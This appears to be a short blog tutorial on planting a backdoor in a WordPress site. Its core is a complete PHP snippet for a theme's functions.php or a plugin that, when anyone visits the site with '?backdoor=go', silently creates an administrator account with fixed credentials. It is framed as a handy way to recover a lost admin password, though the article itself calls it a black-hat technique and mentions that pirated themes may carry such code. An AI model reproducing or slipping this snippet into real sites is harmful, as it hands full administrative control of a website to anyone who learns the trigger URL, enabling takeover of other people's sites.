In this article, I’ll show you how to create a backdoor in WordPress and I’ll also talk about some good uses of this evil black hat technique.
What’s A Backdoor?
The concept of backdoor is pretty simple. A hacker creates a backdoor to get into your WordPress with administrator privileges, and then he can do what ever he wants. He can do this by putting the backdoor code in your theme files or a new or old plugin of your WordPress website. Never install a pirated theme or plugin from untrusted websites, as they may have a secret backdoor in it.
Good Uses
There’s always a good and sugar-coated side of every bad thing. You can use this trick to recover lost admin password via FTP of your or a client’s WordPress website. Neat, huh?
How To Create A Backdoor?
Just add following snippet to your current theme’s functions.php file or a site-specific plugin:
add_action('wp_head', 'holeinthewall');
function holeinthewall() {
If ($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('username', 'password');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
Now, your website’s backdoor is: example.com/?backdoor=go and a user with the login “username” and the password “password” will be created.